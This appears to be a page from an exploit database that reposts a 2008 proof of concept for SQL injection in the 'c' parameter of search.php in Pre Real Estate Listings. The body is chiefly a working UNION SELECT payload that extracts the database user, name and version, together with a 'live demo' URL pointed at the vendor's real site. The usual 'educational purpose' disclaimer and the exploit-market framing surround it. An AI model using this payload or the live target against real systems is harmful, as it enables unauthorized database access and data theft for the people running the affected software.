[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pre Real Estate Listings (search.php c) SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3674
Category
web applications
Date add
14-09-2008
Platform
unsorted
===================================================================
Pre Real Estate Listings (search.php c) SQL Injection Vulnerability
===================================================================



# Pre Real Estate Listings (search.php c) Remote SQL Injection Vulnerability
# url: http://preproject.com/
#
# Author: JosS
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.



(SQL-way): http://www.localhost/search.php?c=(135['foo])

PoC: 135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*

live demo: 

http://preproject.com/ulisting/search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/*

- In memory of rgod -



#  0day.today [2024-12-26]  #